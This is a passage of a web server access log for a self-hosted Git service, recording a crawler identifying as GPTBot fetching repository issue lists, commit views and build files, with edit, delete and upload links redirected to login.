git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:16:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:16:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:16:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:16:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 11755] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:16:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14743] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14711] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14742] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:16:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10048] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" -[17/Feb/2026:16:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10050] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:16:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" -[17/Feb/2026:16:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10047] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" -[17/Feb/2026:16:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:16:59:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12391] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11987] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:16:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9954] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10660] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9952] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3389] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14323] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11746] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" -[17/Feb/2026:16:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14604] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:59:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip 